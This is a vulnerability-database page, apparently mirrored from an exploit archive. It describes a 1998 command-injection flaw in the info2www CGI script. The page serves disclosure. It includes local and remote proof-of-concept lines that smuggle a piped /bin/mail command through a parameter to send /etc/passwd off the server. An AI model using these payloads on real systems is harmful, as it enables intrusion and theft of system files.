Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Info2www 1.0/1.1 - CGI Input Handling

Related Vulnerabilities: CVE-1999-0266  
Publish Date: 03 Mar 1998
Author: Niall Smart
Source / Download Exploit 
                source: http://www.securityfocus.com/bid/1995/info

The info2www script allows HTTP access to information stored in GNU EMACS Info Nodes. This script fails to properly parse input and can be used to execute commands on the server with permissions of the web server, by passing commands as part of a variable. Potential consequences of a successful exploitation involve anything the web server process has permissions to do, including possibly web site defacement. 

Locally:
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail recipient </etc/passwd|)'
$
You have new mail.
$

Remotely:
http://targethost/cgi-bin/info2www?(../../../../../../../../bin/mail recipient </etc/passwd|)

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started